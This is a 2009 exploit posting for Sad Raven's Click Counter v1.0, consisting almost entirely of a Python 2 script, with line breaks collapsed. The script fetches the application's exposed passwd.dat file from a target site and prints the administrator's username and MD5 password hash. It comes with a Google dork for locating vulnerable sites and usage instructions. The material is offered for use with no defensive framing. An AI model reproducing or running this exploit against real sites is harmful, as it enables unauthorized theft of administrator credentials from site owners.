sadraven-disclose.txt
Posted on 21 January 2009
#!/usr/bin/python #Portal Name: Sad Raven's Click Counter #version : 1.0 #Google Dork : Sad Raven's Click Counter v1.0 #Exploit Coded by: Pouya_Server #Exploit Discovered by: Pouya_Server #Contact Me : Pouya.s3rver@Gmail.com import urllib import sys import parser serv="http://" i=0 for arg in sys.argv: i=i+1 if i!=3: print """ Sad Raven's Click Counter v1.0 (passwd.dat) Usage:exploit.py [targetsite] [path] Example:exploit.py www.target.com /Path/ Result=$Password['Admin']="c71032e32b9ce349f99f655e68d7324g" $Password['Admin Username']="Admin Password [MD5]" """ else: adres=sys.argv[1] path=sys.argv[2] str1=adres.join([serv,path]) str2=str1.join(['','/passwd.dat']) print " [~]Connecting..." url=urllib.urlopen(str2).read(); print " [+]Connected!" test=url.find(path); t=0; print " -=[Admin Username and Password]=-" while(url[test+1]!=1): # Pouya print url[test], if(url[test]==' '): t=t+1; if(t==2): break; test=test+1; print " [ coded by Pouya_Server ]"